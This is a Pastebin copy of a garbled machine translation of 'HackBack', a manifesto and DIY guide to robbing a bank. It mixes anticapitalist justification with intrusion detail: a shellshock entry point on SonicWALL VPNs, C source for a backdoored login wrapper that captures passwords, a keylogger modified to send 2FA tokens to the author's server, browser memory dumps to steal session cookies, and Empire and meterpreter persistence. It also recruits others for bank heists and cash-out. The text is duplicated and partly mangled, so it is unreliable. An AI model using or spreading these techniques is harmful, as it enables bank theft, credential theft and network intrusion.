Advertisement
cephurs

HackBack.txtEN

Nov 19th, 2019
752
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.                 _ _ _ ____ _ _
  2.                | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  3.                | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  4.                | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  5.                |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  6.  
  7.                          A DIY guide to bank robbery
  8.                        
  9.                        
  10.                                   ^__^
  11.                                   (oo)\_______
  12.                                ( (__)\ )\/\
  13.                                 _) / ||----w |
  14.                                (.)/ || ||
  15.                                 `'
  16.                          By Subcowmandante Marcos
  17.                            
  18.  
  19.                            
  20.                            
  21.                               I am a wild child
  22.                           Innocent, free, wild
  23.                             I'm all ages
  24.                            My grandparents live in me
  25.  
  26.                            I'm a brother of the clouds
  27.                              And I only know how to share
  28.                            I know that everything belongs to everyone
  29.                            that everything is alive in me
  30.  
  31.                           My heart is a star
  32.                             I am a son of the earth
  33.                          I travel aboard my spirit
  34.                             Path to eternity
  35.  
  36.  
  37. Ésta is my simple word that seeks to touch the heart of simple people and
  38. humble, but also dignified and rebellious. Ésta is my simple word to tell
  39. of my hacking, and to invite other people to hack with joy.
  40. rebellion.
  41.  
  42. I hacked into a bank. I did it to give a liquidity injection, but this time from
  43. and the simple and humble people who resist and rebel against the
  44. injustices all over the world. In other words: I robbed a bank and gave away the
  45. money. But it wasn't just me who did it. The free software movement, the
  46. offensive powershell community, the metasploit project and the hacker community
  47. in general are the ones that made this hacking possible. The exploit.in community
  48. made it possible to turn the intrusion on a bank's computers into cash
  49. and bitcoin. Projects Tor, Qubes and Whonix, at and cryptographers and
  50. activists who defend privacy and anonymity, they are my nahuales, they are
  51. to say, my protectors [1]. They accompany me every night and make it possible for me to stay in
  52. freedom.
  53.  
  54. I didn't do anything complicated. I only saw injustice in this world, I felt love
  55. for all beings, and I expressed that love in the best way I could, through the
  56. tools I know how to use. I am not moved by hatred of banks, nor of the rich, but by
  57. a love for life, and the desire for a world where everyone can realize their dream.
  58. and live a full life. I would like to explain a little how I see the world,
  59. so they can get an idea of how I got to feel and act like this.
  60. And I also hope that this guide is a recipe that you can follow, combining the
  61. same ingredients to bake the same sponge cake. Who knows, over there these
  62. so powerful tools end up serving you too to express the
  63. love they feel.
  64.  
  65.  
  66.                           We are all wild children
  67.                         innocent, free, wild
  68.  
  69.                      We are all brothers of the trees
  70.                               children of the earth
  71.  
  72.                   We just have to put in our heart
  73.                             a lit star
  74.  
  75.                    (song by Alberto Kuselman and Chamalú)
  76.  
  77.  
  78. The police are going to invest a lot of resources in researching me. They believe that the
  79. system works, or at least it will work once they catch up to all the
  80. "bad guys." I'm just the product of a system that doesn't work.
  81. As long as there is injustice, exploitation, alienation, violence and the
  82. ecological destruction, there will come many more like me: an endless series of
  83. people who will reject as illegitimate the bad system responsible for this
  84. suffering. That badly done system is not going to fix me by arresting me. I
  85. only one of the millions of seeds Tupac planted 238 years ago in La Paz.
  86. Peace [2], and I hope that my actions and writings will water the seed of rebellion.
  87. in their hearts.
  88.  
  89. [1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
  90. 2] It was before he was killed by the Spaniards, just one day like yesterday, that
  91.    he said that "they'll only kill me, but tomorrow I'll be back and I'll be millions".
  92.  
  93. ____________________________________________
  94. < In order to be seen, we covered our faces >
  95. --------------------------------------------
  96.         \
  97.          \ ^__^
  98.            (oo)\_______
  99.         ( (__)\ )\/\
  100.          _) / ||----w |
  101.         (.)/ || ||
  102.          `'
  103. To make us listen, lxs hackers sometimes have to cover our faces, because
  104. don't
  105.  
  106.  
  107.                 _ _ _ ____ _ _
  108.                | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
  109.                | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
  110.                | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
  111.                | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
  112.  
  113.                          A DIY guide to rob banks
  114.                        
  115.                        
  116.                                   ^ __ ^
  117.                                   (oo) \ _______
  118.                                ((__) \) \ / \
  119.                                 _) / || ---- w |
  120.                                (.) / | | ||
  121.                                 ``
  122.                           By Subcowmandante Marcos
  123.                              
  124.  
  125.                              
  126.                              
  127.                                I am a wild child
  128.                            Innocent, free, wild
  129.                              I have all ages
  130.                             My grandparents live in me
  131.  
  132.                             I am a brother of the clouds
  133.                               And I only know I know
  134.                             that everything belongs to everyone
  135.                             everything is alive in me
  136.  
  137.                            My heart he is a star
  138.                              I am a son of the earth
  139.                           I travel aboard my spirit
  140.                              Road to eternity
  141.  
  142.  
  143. This is my simple word that seeks to touch the hearts of simple and
  144. humble people, but also dignified and rebellious. This is my simple word to tell
  145. about my hacks, and to invite other people to hack with cheerful
  146. rebellion.
  147.  
  148. I hacked a bank. I did it to give an injection of liquidity, but this time from
  149. below and to the simple and humble people who resist and rebel against
  150. injustices throughout the world. In other words: I robbed a bank and gave away the
  151. money. But it wasn't me alone who did it. The free software movement, the
  152. offensive powershell community, the metasploit project and the hacker community
  153. in general they are the ones that enabled this hacking. The exploit.in community
  154. made it possible to turn the intrusion into a bank's computers into cash
  155. and bitcoin. The Tor, Qubes and Whonix projects, together with the cryptographers and
  156. activists who defend privacy and anonymity, are my nahuales,
  157. that is , my protectors [1]. They accompany me every night and make it possible for me to remain
  158. free.
  159.  
  160. I did nothing complicated. I only saw the injustice in this world, felt love
  161. for all beings, and expressed that love in the best way I could, through the
  162. tools I know how to use. I do not move the hatred of the banks, or the rich, but
  163. a love for life, and the desire of a world where everyone can realize their
  164. potential and live a full life. I would like to explain a little how I see the world,
  165. so that you can get an idea of ​​how I came to feel and act like that.
  166. And I also hope that this guide is a recipe that you can follow, combining the
  167. same ingredients to bake the same cake. Who knows, out there these
  168. powerful tools end up serving you too to express the
  169. love you feel.
  170.  
  171.  
  172.                            We are all
  173.                          innocent, free, wild wild children
  174.  
  175.                       We are all brothers of the trees
  176.                                children of the earth
  177.  
  178.                    We just have to put in our hearts
  179.                              a burning star
  180.  
  181.                     (song by Alberto Kuselman and Chamalú)
  182.  
  183.  
  184. The police will invest a chingo of resources to investigate me. They think the
  185. system works, or at least it will work once they catch all the
  186. "bad guys." I am nothing more than the product of a system that does not work.
  187. As long as there is injustice, exploitation, alienation, violence and
  188. ecological destruction, many more will come like me: an endless series of
  189. people who will illegitimately reject the evil system responsible for this
  190. suffering. That badly done system is not going to compose arresting me. I am
  191. only one of the millions of seeds that Tupac planted 238 years ago in La
  192. Paz [2], and I hope that my actions and writings water the seed of rebellion
  193. in their hearts.
  194.  
  195. [1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
  196. [2] was before he was killed by the Spaniards, just one day as yesterday, who
  197.     said that "they will only kill me , but tomorrow I will come back and be millions. "
  198.  
  199.  ____________________________________________
  200. <To be seen, we cover our faces>
  201.  -------------------------------------- ------
  202.          \
  203.           \ ^ __ ^
  204.             (oo) \ _______
  205.          ((__) \) \ / \
  206.           _) / || ---- w |
  207.          (.) / || ||
  208.           ``
  209. To make us listen, hackers sometimes have to cover our faces, because
  210. we are not interested in seeing our face but understanding our word. The
  211. mask can be from Guy Fawkes, Salvador Dalí, from Fsociety, or in some cases
  212. the puppet of a crested toad. By affinity, this time I went to dig up
  213. a deceased to lend me his balaclava. I think then I should clarify that
  214. Sup Marcos is innocent of all that is told here because, in addition to being
  215. dead, I did not consult him. I hope your ghost, if you find out from a
  216. Chiapaneca hammock , knows how to find goodness for, as they say there, "dismiss this
  217. deep fake "with the same gesture with which an inopportune insect moves away - it
  218. could very well be a beetle.
  219.  
  220. Even so with the balaclava and the name change, many of those who support my
  221. actions are perhaps going to pay too much attention to my person. With their own
  222. autonomy shattered for a lifetime of domination, they will be looking for a
  223. leader to follow, or a hero to save them. But behind the balaclava
  224. I am just a child. We are all Wild children. We just have to place a star
  225. in the chamas em nossos corações.
  226.  
  227.  
  228.  
  229. - [1 - Why expropriate] -------------------- ---------------------------------
  230.  
  231. Capitalism is a system in which a minority has come to appropriate
  232. a vast majority of the world's resources through war, theft and
  233. exploitation. By snatching the commons [1], they forced those below to
  234. be under the control of that minority that owns everything. It is a system
  235. fundamentally incompatible with freedom, equality, democracy and
  236. Suma Qamaña (Good Living). It may sound ridiculous to those of us who have grown up in
  237. maquinaria propagandística que nos enseñó que capitalismo es libertad, pero en
  238. truth, what I say is not a new or controversial idea [2]. The founders
  239. of the United States of America knew that they had to choose between creating a
  240. capitalist society, or a free and democratic society. Madison recognized that "the
  241. man who possesses wealth, the one who lies on his couch or rolls in his carriage,
  242. he cannot judge the wishes or feelings of the day laborer. "But to protect himself
  243. against the" spirit of equalization "of the landless day laborers, it seemed
  244. to him that only landowners should vote, and that the government had to
  245. serve to" protect the opulent minority against the great majority. "John
  246. Jay was more to the point and said," Those who are owners ± os of the country deberÃan
  247. govern. "
  248.  
  249. ____________________________________________________
  250. / There is what is called green capitalism \.
  251. | Let's make capitalism history before us |
  252. \ become history./
  253.  ------------------------------------------------- ---
  254.  \ / \ ___ / \
  255.   \ // \ / \ / \\
  256.      ((OO))
  257.       \\ / \ //
  258.        \ / | | \ /
  259.         | | | | Evgeny, the great ignored elephant, doesn't understand why everyone
  260.        | | | | They pretend not to see you on the panels about climate change, like this
  261.        | or | that here I give you a chance to say your lines.
  262.        | | | |
  263.        | m | | m |  
  264.  
  265.  
  266. In the same way that bell hooks [3] argues that the rejection of the
  267. patriarchal culture of domination is an act in defense of the male's own interest (since
  268. he emotionally mutilates them and prevents them from feeling love and connection
  269. fully), I believe that the culture of domination of capitalism has an effect
  270. similar about the rich, and that they could have fuller and more satisfying lives
  271. if they rejected the class system from which they believe they benefit. For many,
  272. class privilege amounts to a childhood of emotional neglect, followed
  273. by a life of superficial social interactions and meaningless work. Can
  274. that basically know that only can connect genuinely with people
  275. when working with them as equals, and not when put at your service.
  276. They may know that sharing their material wealth is the best they can do
  277. with it. You may also know that the significant experiences,
  278. connections and relationships that count are not the ones that come from
  279. mercantile interactions, but precisely to reject the logic of the market
  280. and give without expecting anything in return. They may know that all they need to
  281. escape from their prison and live for real is to get carried away, give up control, and
  282. take a leap of faith. But most lack courage.
  283.  
  284. Then it would be naive of us to direct our efforts to try to
  285. produce some kind of spiritual awakening in the rich [4]. As Astata
  286. Shakur says : "No one in the world, no one in history has ever achieved their
  287. freedom by appealing to the moral sense of their oppressors." Actually, when the
  288. rich distribute their money, they almost always do it in a way that reinforces the
  289. system that to begin with allowed them to amass their enormous and illegitimate wealth
  290. [5]. And change is unlikely to come through a political process;
  291. As Lucy Parsons says: "Let us never be fooled that the rich will
  292. let us vote to take away their wealth." Colin Jenkins justifies the
  293. expropriation with these words [6]:
  294.  
  295.     No nos equivoquemos, la expropiación no es robo. No es la confiscación de
  296.     money earned "with the sweat of the forehead." It is not theft of
  297.     private property . Rather, it is the recovery of huge amounts of land and
  298.     wealth that have been forged with stolen natural resources,
  299.     human slavery , forced labor force and amassed in hundreds of years for a
  300.     Small minority This wealth ... is illegitimate, both for moral purposes and
  301.     for the exploitation mechanisms that have been used to create it.
  302.  
  303. For Colin, the first step is that "we have to free ourselves from our
  304. mental ties (believing that wealth and private property have been earned by
  305. those who monopolize them; and that, therefore, they should be something to respect,
  306. revere, and even something to pursue), open our minds, study and
  307. learn from history, and recognize this illegitimacy together. " Here are
  308. some books that have helped me with this [7] [8] [9] [10] [11].
  309.  
  310. According to Barack Obama, economic inequality is "the challenge that defines our
  311. time. "Computer hacking is a powerful tool to combat
  312. economic inequality. Former NSA director Keith Alexander agrees
  313. and says that hacking is responsible for" the greatest transfer of wealth in
  314. history. "
  315.  
  316.  _________________________
  317. / The story is ours \
  318. \ and it is done by hackers! /
  319.  -------------------------
  320.          \
  321.           \ ^ __ ^
  322.             (oo) \ _______
  323.          (( __) \) \ / \
  324.           _) / || ---- w |
  325.          (.) / || ||
  326.           ``
  327. Allen present, now and forever!
  328.  
  329. [1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
  330. [2] https://chomsky.info/commongood02/
  331. [3] The Will to Change: Men, Masculinity, and Love
  332. [4] their own religion is already very clear about it:
  333.     https://dailyverses.net/es/materialismo
  334. [5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
  335. [6] http://www.hamptoninstitution.org /expropriation-or-bust.html
  336. [7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Age
  337.     of the Masked Gods and the Covered Kings
  338. [8] Caliban and the Witch
  339. [9] In Debt: An Alternative History of the Economy [
  340. 10] The Other History of the United States [
  341. 11] Veins Latin American Open
  342.  
  343.  
  344.  
  345.                     _________________________________
  346.                    <Our weapon is our keyboard>
  347.                     ---------------------------------
  348.                               \
  349.                                \ ^ __ ^
  350.                                  (oo) \ _______
  351.                               ((__) \) \ / \
  352.                                _) / || ---- w |
  353.                               (.) / || ||
  354.                                `` ^^ ^^
  355.  
  356. - [2 - Introduction] ------------------------------------- ---------------------
  357.  
  358. This guide explains how I hacked the Cayman Bank and Trust Company
  359. (Isle of Man). Why am I publishing this, almost four years later?
  360.  
  361. 1) To show what is possible
  362.  
  363. Hackers working for social change have limited themselves to developing
  364. security and privacy tools, DDoS, perform defaults and leaks.
  365. Wherever you go, there are radical projects for a social change in a complete
  366. state of precariousness, and there would be much that they could do with some
  367. expropriated money . At least for the working class, bank robbery is something
  368. socially accepted, and those who do are seen as people's heroes. In
  369. the digital age, robbing a bank is a non-violent, less risky act, and the
  370. reward is greater than ever. So why are only
  371. black hat hackers doing it for their personal benefit, and never
  372. hacktivists to finance radical projects? Maybe they don't think they are
  373. able to do it The big bank hacks are on the news every
  374. so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea
  375. , or the hacking of banks attributed to the Carbanak group [2], which they describe
  376. as a very group Large and well organized Russian hackers, with different
  377. members who would be specialized in different tasks. And, it is not so
  378. complicated.
  379.  
  380. It is because of our collective belief that the financial system is unquestionable
  381. that we exercise control over ourselves, and maintain the class system
  382. without those above having to do anything [3]. Being able to see how vulnerable and
  383. fragile the financial system really is helps us break that hallucination
  384. collective That is why banks have a strong incentive not to report
  385. hacks, and to exaggerate how sophisticated the attackers are. None of the
  386. financial hacks I made, or those I've known, have ever been reported.
  387. This is going to be the first, and not because the bank wanted to, but because I
  388. decided to publish it.
  389.  
  390. As you are about to learn in this home guide, hacking a bank and
  391. transferring money through the SWIFT network does not require the support of any
  392. government or a large and specialized group. It is something totally possible
  393. being a mere amateur and a lot of hacker, with only
  394. public tools and basic knowledge of how to write a script.
  395.  
  396. [1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
  397. [2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak / 67508 /
  398. [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
  399.  
  400. 2) Help withdraw cash
  401.  
  402. Many of those who read this already have, or with a little study will be
  403. able to acquire, the skills necessary to carry out a hack
  404. like this. However, many will find that they lack the
  405. necessary criminal connections to get the handles in condition. In my
  406. case, this was the first bank that hacked, and at that time I only had a
  407. few and mediocre accounts ready to withdraw the cash (known
  408. as bank drops), so it was only a few hundred thousand that
  409. I could withdraw in total, when it is normal to get millions. Now, on the other hand, I do
  410. have the knowledge and connections to get cash more seriously,
  411. so if they find themselves hacking a bank but they need help to turn
  412. that into real money, and they want to use that wool to Fund
  413. radical social projects , contact me.
  414.  
  415. 3) Collaborate
  416.  
  417. It is possible to hack banks as an amateur who works alone, but the
  418. net is that, in general, it is not as easy as I paint it here. I was lucky with
  419. this bank for several reasons:
  420.  
  421. 1) It was a small bank, so it took me much less time to  
  422.   understand how everything worked.
  423.  
  424. 2) They had no procedure to check the sent swift messages.
  425.   Many banks have one, and you need to write code to hide your
  426.   transfers from their monitoring system.
  427.  
  428. 3) They only used password authentication to access the application with
  429.   which they connected to the SWIFT network. Most banks now use RSA
  430.   SecurID, or some form of 2FA. You can skip this by typing code to
  431.   receive an alert when your token enters, so you can use it before it
  432.   expires. It's simpler than it seems: I've used Get-Keystrokes [1],
  433.   modifying it so that instead of storing the pressed keys, a
  434.   petición GET a mi servidor cada vez que se detecta que han introducido un
  435.   username is made. This request adds the username to the url and, as they
  436.   type the token, several GETs are made with the token digits
  437.   concatenated to the url. On my side I leave this running in the meantime:
  438.  
  439.   ssh me @ my_secret_server 'tail -f / var / log / apache2 / access_log'
  440.    | while read i; I miss $ i; aplay alarm.wav &> / dev / null; done
  441.  
  442.   If it is a web application, you can skip the 2FA by stealing the cookie
  443.   after they have authenticated. I am not an APT with a team of coders
  444.   who can make me customized tools. I am a simple person who lives
  445.   of what the terminal [2] gives it, so what I use is:
  446.  
  447.   procdump64 / accepteula -r
  448.   -ma_Browser_PID_strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul
  449.  
  450.   or passing it through findstr rather than strings, which makes it much
  451.   faster
  452.   :
  453.   findstr PHPSESSID * .dmp> tmp
  454.   strings64 / accepteula tmp | findstr PHPSESSID 2> nul
  455.  
  456.   Another way to skip it is to access your session with a hidden VNC (hvnc)
  457.   after they have authenticated, or with a little creativity you could also
  458.   focus on another part of their process in instead of sending
  459.   SWIFT messages directly.
  460.  
  461. I think that if I collaborated with other experienced bank hackers we could
  462. make hundreds of banks like Carnabak, instead of being one from time
  463. to time on my own. So if you have experience with similar hacks and
  464. quieres colaborar, contactame. Encontrarás mi correo y mi llave PGP al final de
  465. the previous guide [3].
  466.  
  467. [1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
  468.    Exfiltration / Get-Keystrokes.ps1
  469. [2] https://lolbas-project.github.io/
  470. [3] https: // www. exploit-db.com/papers/41914
  471.  
  472. ________________________________________
  473. / If robbing a bank would change things, \
  474. \ they would make it illegal /
  475. ------------------------- ---------------
  476.         \
  477.          \ ^ __ ^
  478.            (oo) \ _______
  479.         ((__) \) \ / \
  480.          _) / || ---- w |
  481.         (.) / || ||
  482.          ``
  483.  
  484. - [3 - Be careful out there] -------------------------------------- --------
  485.  
  486. It is important to take some simple precautions. I will refer to this
  487. same section of my last guide [1], since it seems to work just fine
  488. [2]. All I have to add is that, in Trump's words, "Unless you
  489. catch hackers in fraganti, it is difficult to determine who is
  490. doing the hacking," so the police are Getting more and more
  491. creative [3] [4] in their attempts to grab the criminals on the spot (when
  492. their encrypted hard drives are unlocked). So it would be nice if by
  493. For example, you carry a certain bluetooth device and configure your
  494. computer to turn off when it
  495. moves beyond a certain range, or when an accelerometer detects movement, or something like that.
  496.  
  497. It may be that writing long articles detailing your actions and your ideology is not
  498. the safest thing in the world (ups!), But at times I feel I had to
  499. .
  500.  
  501.                         If I did not believe in who listens to me
  502.                         If I did not believe in what hurts
  503.                         If I did not believe in what was left
  504.                         If I did not believe in what struggles
  505.                         That thing was ...
  506.                         What was the club without a quarry?
  507.  
  508. [1] https://www.exploit-db.com/papers/41914
  509. [2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar -a-
  510.     phineas-fisher.html
  511. [3] https://www.wired.com/2015/05/silk-road-2/
  512. [4] https://motherboard.vice.com/en_us/article/59wwxx/ fbi-airs-alexandre-cazes-
  513.     alphabay-arrest-video
  514.  
  515.  
  516.     , - \ __
  517.     | f- "Y \ ____________________
  518.    \ () 7L / | Be gay! |
  519.     cgD | Do the crime! | __ _
  520.     | \ (---------------------. 'Y'>,
  521.      \ \ \ / _ _ \
  522.       \\\ \) (_) (_) (|}
  523.        \ \\ {4A} /
  524.         \\\ \ uLuJJ / \ l
  525.          \\\ | 3 p) /
  526.           \\\ ___ __________ / nnm_n //
  527.           c7 ___-__, __-) \, __) (". \ _> - <_ / D
  528.                       // V \ _ "-._.__ G G_c __.-__ <" / (\
  529.                              <"-._> __-, G _.___) \ \ 7 \
  530.                            (" -.__. | \ "<.__.-") \ \
  531.                             | "-.__" \ | "-.__.-". \ \ \
  532.                             ("-.__" ". \" -.__.- ". | \ _ \
  533.                             \" -.__ "" | ! | "-.__.-".) \ \
  534.                             "-.__" "\ _ |" -.__.- "./ \ l
  535.                               ".__" ""> G> -.__.- "> .--, _
  536.                                  " "G
  537.  
  538.        Many blame queer people for the decline of this society;
  539.                         we are proud of it
  540.                Some believe that we want to reduce
  541.                     this civilization and its moral fabric to ashes ;
  542.                      They could not be more right.
  543.    They often describe us as depraved, decadent and unruly.
  544.                    But oh! They have not seen anything yet
  545.  
  546. https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime
  547.  
  548.  
  549. - [4 - Getting access] -------------- ----------------------------------------
  550.  
  551. In another place [1] I was talking about the main ways to get
  552. Initial access to a company's network during a targeted attack. However,
  553. this was not a targeted attack. I didn't set out to hack a specific bank, what
  554. I wanted was to hack any bank, which ends up being a much
  555. simpler task . This type of nonspecific approach was popularized by Lulzsec and
  556. Anonymous [2]. As part of [1], I prepared an exploit and
  557. post-exploitation tools for a popular VPN device. Then I started scanning the
  558. entire internet with zmap [3] and zgrab to identify other
  559. vulnerable devices . I had the scanner save the vulnerable IPs, along with the
  560. "common name" and "alt names" of the device's SSL certificate, the names
  561. Windows domain of the device, and reverse DNS lookup for the IP. I
  562. made a grep to the result in search of the word "bank", and there was enough to
  563. choose from, but the truth is that the word "Cayman" attracted me, and that's how I came
  564. to stay with this one.
  565.  
  566. [1] https://www.exploit-db.com/papers/41914
  567. [2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
  568. [3] https : //github.com/zmap/zmap
  569.  
  570.  
  571. ---- [4.1 - The Exploit] ------------------------------ --------------------------
  572.  
  573. When I published my last DIY guide [1] I did not reveal the details of the exploit of
  574. sonicwall que había usado para hackear a Hacking Team, ya que era muy útil para
  575. other hacks, like this one , and I still hadn't finished having fun with him.
  576. Then determined to hack Hacking Team, Raisin © weeks doing engineering
  577. inverse model of the SonicWALL ssl-vpn and even gotta find
  578. several vulnerabilities of corruption more or less memory difÃciles
  579. explode before I realized that the device It was easily exploitable
  580. with shellshock [2]. When shellshock came out, many sonicwall devices were
  581. vulnerable, only with a request to cgi-bin / welcome, and a payload on the
  582. user-agent. Dell released a security update and an advisory for these
  583. versions. The version used by Hacking Team and this bank had the version of
  584. vulnerable bash, but CGI requests did not trigger the shellshock except for
  585. the requests to a shell script, and there was just one accessible:
  586. cgi-bin / jarrewrite.sh. This seems to have escaped Dell's in their note,
  587. since they never released a security update or an advisory for that
  588. version of the sonicwall. And, kindly, Dell had done twounix setuid root,
  589. leaving a device easy to root.
  590.  
  591. In my last guide many read that I spent weeks researching a device
  592. until I found an exploit, and assumed that it meant that I was some kind
  593. of lite hacker. The reality, that is, the fact that it took me two weeks to
  594. realize that it was trivially exploitable with shellshock, is perhaps less
  595. Flattering to me, but I think it's also more inspiring. Show that
  596. you can really do this for yourself. You don't need to be a genius, I
  597. certainly am not. Actually my work against Hacking Team started a
  598. year earlier. When you discover a Hacking Team and Gamma Group in
  599. investigations CitizenLab [3] [4], I decided to explore a bit and see if I could
  600. find something. I didn't get anywhere with Hacking Team, but I was lucky with
  601. Gamma Group, and I was able to hack your customer support portal with
  602. basic sql injection and file upload vulnerabilities [5] [6]. However, even though
  603. its support server gave me a pivot towards the internal Gamma network
  604. Group, I was unable to penetrate beyond the company. From this
  605. experience with the Gamma Group and other hacks, I realized that I was
  606. really limited by my lack of knowledge about privilege escalation and
  607. lateral movement in windows domains, active directory and windows in general.
  608. So I studied and practiced (see section 11), until I felt I was ready
  609. to pay a visit to Hacking Team almost a year later. The practice
  610. paid off, and this time I was able to make a full commitment of the
  611. company [7]. Before I realized that I could go in with shellshock, I was
  612. willing to spend happy whole months of life studying development of
  613. exploits and writing a reliable exploit for one of the
  614. memory corruption vulnerabilities I had encountered. I only knew that Hacking Team
  615. needed to be exposed, and that it would take me as much time as necessary and
  616. learn what I had to learn to get it. To perform these
  617. hacks you don't need to be bright. You don't even need a great
  618. technical knowledge . You just need dedication, and believe in yourself.
  619.  
  620. [1] https://www.exploit-db.com/papers/41914
  621. [2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
  622. [3] https://citizenlab.ca/tag/ hacking-team /
  623. [4] https://citizenlab.ca/tag/finfisher/
  624. [5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
  625.    bahrain-track-arab-spring-protesters /
  626. [6] https: //www.exploit- db.com/papers/41913
  627. [7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
  628.  
  629.  
  630. ----[ 4.2 - El Backdoor ]-------------------------------------------------------
  631.  
  632. Part of the backdoor I prepared for the Hacking Team (see [1], section 6) was a
  633. simple wrapper on the login page to capture passwords:
  634.  
  635. #include <stdio.h>
  636. #include <unistd.h>
  637. #include <fcntl.h>
  638. #include <string.h>
  639. #include <stdlib.h>
  640.  
  641. int main ()
  642. {
  643.        char buf [2048];
  644.        int nread, pfile;
  645.  
  646.        / * pull the log if we send a special cookie * /
  647.        char * cookies = getenv ("HTTP_COOKIE");
  648.        if (cookies && strstr (cookies, "our private password")) {
  649.                write (1, "Content-type: text / plain \ n \ n", 26);
  650.                pfile = open ("/ tmp / .pfile", O_RDONLY);
  651.                while ((nread = read (pfile, buf, sizeof (buf)))> 0)
  652.                        write (1, buf, nread);
  653.                exit (0);
  654.        }
  655.  
  656.        / * the principal stores the POST data and sends it to the child,
  657.           which is the actual login program * /
  658.        int fd [2];
  659.        pipe (fd);
  660.        pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
  661.                close (fd [0]);
  662.  
  663.                while ((nread = read (0, buf, sizeof (buf)))> 0) {
  664.                        write (fd [1], buf, nread);
  665.                        write (pfile, buf, nread);
  666.                }
  667.  
  668.                write (pfile, "\ n", 1);
  669.                close (fd [1]);
  670.                close (pfile);
  671.                wait (NULL);
  672.        } else {
  673.                close (fd [1]);
  674.                dup2 (fd [0], 0);
  675.                close (fd [0]);
  676.                execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
  677.                      "userLogin", NULL);
  678.        }
  679. }
  680.  
  681. In the case of Hacking Team, they were logging on to the VPN with single-use passwords,
  682. de modo que la VPN me dio acceso solamente a la red, y a partir de ahí me tomó
  683. an extra effort to get domain admins on their network. In the other guide I wrote
  684. about side passes and privilege escalation in windows domains [1]. In this
  685. case, on the other hand, it was the same Windows domain passwords that were
  686. used to authenticate against the VPN, so I could get a good number of
  687. user passwords, including that of the domain admin. Now he had full
  688. access to his network, but usually this is the easy part. The most complicated part
  689. is to understand how they operate and how to get the gun.
  690.  
  691. [1] https://www.exploit-db.com/papers/41914
  692.  
  693.  
  694. ---- [4.3 - Fun facts] ---------------------------------------- ------------
  695.  
  696. By continuing the investigation they did about the hacking, I found it interesting to
  697. see that, by the same time I did it, the bank may have been
  698. compromised by someone else via a targeted phishing email [1].
  699. As the old saying goes, "give a person an exploit and he will have access for a
  700. day, teach phishear and he will have access all his life" [2]. The fact that
  701. someone else, by chance and at the same time as me, put this
  702. small bank in the spotlight (they registered a domain similar to the real domain of the bank
  703. to be able to send phishing from there) suggests that bank hacks
  704. They occur much more frequently than is known.
  705.  
  706. A fun suggestion for you to follow the investigations of your
  707. hacks is to have a backup access, one that you won't touch unless you
  708. lose normal access. I have a simple script that expects commands
  709. once a day, or less, only to maintain long-term access in the event
  710. they block my regular access. Then I had a powershell empire [3]
  711. calling home more frequently to a different IP, and I used empire to
  712. launch meterpreter [4] against a third IP, where I did most of
  713. my work. When PWC started investigating the hacking, they found my use of
  714. I emptied and meterpreter and cleaned those computers and blocked those IPs, but they
  715. didn't detect my backup access. PWC had placed
  716. network monitoring devices , to be able to analyze the traffic and see if there were still
  717. infected computers, so I didn't want to connect much to their network. I only
  718. launched mimikatz once to get the new passwords, and from there
  719. I could continue his research by reading his emails in the outlook web access.
  720.  
  721. [1] page 47, Project Pallid Nutmeg.pdf, in torrent
  722. [2] https://twitter.com/thegrugq/status/563964286783877121
  723. [3] https://github.com/EmpireProject/Empire
  724. [4] https : //github.com/rapid7/metasploit-framework
  725.  
  726.  
  727. - [5 - Understand Banking Operations] ------------------------------------
  728.  
  729. To understand how it operated the bank, and how could I get money, I followed the
  730. techniques that I summarized in [1], in section "13.3 - Internal Recognition".
  731. I downloaded a list of all the file names, I made a grep for
  732. words like "SWIFT" and "transfer", and downloaded and read all the
  733. files with interesting names. I also looked for emails from employees, but by
  734. far the most useful technique was to use keyloggers and screenshots to
  735. see how bank employees worked. I didn't know it at the time, but
  736. for this windows brings a very good monitoring tool [2]. How I know
  737. described in the technique no. 5 of section 13.3 in [1], I made a capture of the
  738. keys pressed throughout the domain (including the window titles), made a
  739. grep in search of SWIFT, and found some employees opening 'SWIFT Access
  740. Service Bureau - Logon' . For those employees, I ran meterpreter as in [3], and
  741. used the post / windows / gather / screen_spy module to take screenshots
  742. every 5 seconds, to see how they worked. They were using a
  743. remote citrix app from the bottomline company [4] to access the SWIFT network, where
  744. each payment message SWIFT MT103 had to pass through three employees: one
  745. to "create" the message, one to "verify it", and another to "authorize it". How
  746. I already had all his credentials thanks to the keylogger, I could
  747. easily perform all three steps myself. And from what I knew after seeing them
  748. work, they didn't check the SWIFT messages sent, so I should have
  749. enough time to get the money from my bank drops before the bank
  750. realized and tried to reverse the transfers.
  751.  
  752. [1] https://www.exploit-db.com/papers/41914
  753. [2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
  754.    remotely-with -metasploit /
  755. [3] https://www.trustedsec.com/blog/no_psexec_needed/
  756. [4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
  757.  
  758. _________________________________________
